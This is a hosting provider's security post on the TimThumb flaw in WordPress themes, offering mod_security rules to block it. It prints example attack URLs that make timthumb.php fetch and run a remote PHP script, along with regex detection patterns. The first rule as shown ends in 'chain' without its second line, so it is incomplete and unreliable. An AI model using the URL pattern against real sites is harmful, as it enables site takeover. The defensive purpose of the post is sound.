Some WordPress themes (and other software) vulnerable to “TimThumb” bug

A popular piece of software called “TimThumb” (aka “timthumb.php”) was recently found to have a security bug that allows “hackers” to take over Web sites that use it (more info here).

Some popular custom WordPress themes include TimThumb as part of their features, making those themes vulnerable to this problem. (Just so it’s clear, TimThumb isn’t specific to WordPress, but that’s probably where it’s most commonly used.)

If you use WordPress and your Dashboard tells you to update your theme, you should do so right away (in fact, you should always update an outdated theme or plugin right away).

However, we’ve also added security rules to our servers to protect our Web hosting customers who haven’t yet upgraded. Other people may find the rules useful if they use mod_security on Apache Web servers. The rest of this post contains more technical details.

The mod_security rules

To block this attack, we’ve added two mod_security rules that block URLs that look like either of these:

  http://example.com/wp-content/themes/themename/timthumb.php?src=http://example.org/file.php
  http://example.com/wp-content/themes/themename/cache/1234567890abcdef.php

The first URL is what “hackers” use to cause timthumb.php to download a malicious PHP script; the second is what they use to run that script on your site. While blocking either should fix it, blocking both is even better. These two lines blocks the first type of URL:

SecRule SCRIPT_BASENAME "^(tim)?thumb\.php$" "deny,status:412,auditlog,chain"

And this line blocks the second:

SecRule REQUEST_FILENAME "/wp-content/themes/.+/cache/[a-f0-9]+\.php[345]?$" "deny,status:412,auditlog"

Again, we’ve already applied these rules to our servers, so our Web hosting customers are protected. But if you run a server for other people (especially one that hosts WordPress blogs), you should consider adding these mod_security rules to protect your users, too.

Update August 11: The first rule has been changed to block scripts named both “timthumb.php” and “thumb.php”, based on a suggestion from “bogdan“. Thanks!